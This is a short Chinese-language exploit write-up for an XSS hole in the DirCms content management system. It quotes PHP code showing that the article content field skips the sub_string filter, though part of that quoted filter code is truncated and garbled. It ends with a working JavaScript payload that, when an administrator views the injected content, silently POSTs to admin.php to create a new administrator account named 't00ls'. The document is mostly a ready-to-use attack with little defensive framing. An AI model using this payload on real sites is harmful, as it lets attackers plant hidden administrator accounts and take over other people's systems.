DirCms 内容管理系统 XSS 漏洞和利用方法

以下是引用片段：

    $info['content']=add_alt($info['content'],$info['title']); //////////////////////自动加 ALT标签
    $info['title']=sub_string($info['title'],160,'');    //标题
    $info['keywords']=sub_string($info['keywords'],100,'');  //关键字
    $info['content']=stripslashes($info['content']);   //这里是内容  没有使用sub_string过滤
    $info['status']=in_array($_groupid,$passpriv) || $_groupid==1?1:0;

再看，sub_string：

function sub_string($string, $length, $dot='')
{
    $string=trim($string);
    $strlen = strlen($string);
    if($strlen
    $string = str_replace(array(' ', '&', '"', ''', '“', '”', '—', '<', '>', '·', '…'), array(' ', '&', '"', "'", '“', '”', '—', '', '·', '…'), $string);   //这里做了转义  -0-！ 要是标题没转换更好。。。。。。

以下是引用片段：

var oReq = new ActiveXObject("MSXML2.XMLHTTP");
var str = "do_submit=1&newadmin[username]=t00ls&newadmin[allowmultilogin]=1&newadmin[roleid]=1&newadmin[disabled]=0";
oReq.open("POST","http://127.0.0.1/admin.php?file=admin&action=add",false);
oReq.setRequestHeader("Content-Length",str.length);
oReq.setRequestHeader("CONTENT-TYPE","application/x-www-form-urlencoded");
oReq.send(str);